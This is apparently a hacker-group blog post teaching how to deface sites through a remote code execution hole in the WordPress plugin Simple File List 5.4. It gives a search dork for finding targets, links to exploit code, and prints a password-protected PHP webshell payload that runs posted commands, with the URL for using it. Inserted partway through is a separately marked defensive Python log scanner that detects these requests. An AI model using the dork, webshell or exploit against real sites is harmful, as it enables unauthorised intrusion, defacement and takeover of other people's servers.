Tutorial Deface 2021 WordPress Plugin Simple File List 5.4 - Remote Code Execution

Assalamualaikum, bro!!


Back again on the DestroySquad blog!
This time we're covering RCE (Remote Code Execution).
Let's get straight to it.

Exploit : https://www.exploit-db.com/exploits/48349
Dork : /wp-content/uploads/simple-file-list/


Default payload:

payload = '<?php if($_POST["password"]=="' + password + \
'"){eval($_POST["cmd"]);}else{echo "<title>404 Not Found</title><h1>Not Found</h1>";}?>'
    
    
    
    
    
I've already edited the payload, I just made it simpler.

Exec : localhost/shell.php?cmd=command
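
For defenders, the two request shapes shown above (a PHP script served from the plugin's upload directory, and a `cmd` parameter passed to a PHP file) can be hunted in web-server access logs. The following is an added example, not part of the original post or of the linked exploit; the function names are hypothetical and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Plugin upload directory named in the post's dork.
UPLOAD_DIR = "/wp-content/uploads/simple-file-list/"
# Extensions commonly mapped to the PHP handler (assumption; match your server config).
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Apache/nginx common or combined log format: client, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = unquote(url.path).lower()
    if not PHP_EXT.search(path):
        return None
    reasons = []
    if UPLOAD_DIR in path:
        # An upload folder should only ever serve static files.
        reasons.append("php-in-upload-dir")
    if "cmd" in parse_qs(url.query, keep_blank_values=True):
        # Same request shape as the post's "shell.php?cmd=command".
        reasons.append("cmd-parameter")
    if not reasons:
        return None
    return {"ip": m["ip"], "method": m["method"], "path": path,
            "status": int(m["status"]), "reasons": reasons}

def scan(lines):
    """Classify every log line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2021:10:01:02 +0000] "GET /wp-content/uploads/simple-file-list/report.pdf HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Mar/2021:10:05:40 +0000] "POST /wp-content/uploads/simple-file-list/1618000000.php HTTP/1.1" 200 31',
    '198.51.100.7 - - [12/Mar/2021:10:06:11 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 54',
    '192.0.2.10 - - [12/Mar/2021:10:07:00 +0000] "GET /index.php?p=12 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Standard access logs do not record POST bodies, so the default payload's `password` and `cmd` fields never appear there; the PHP file under the upload directory is the signal to rely on.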

At first I used AntSword, like in the Joomla Configuration RCE post,
but it just gave me Connection Failed, damn it :v
So I just edited the payload,
because in my opinion the default one is a hassle, hehe..
Oh yeah, here's the exploit:

https://pastebin.com/zjhfZ91M

That's all from me, Crusher. Hope it's useful :v
Thanks


Wassalamualaikum.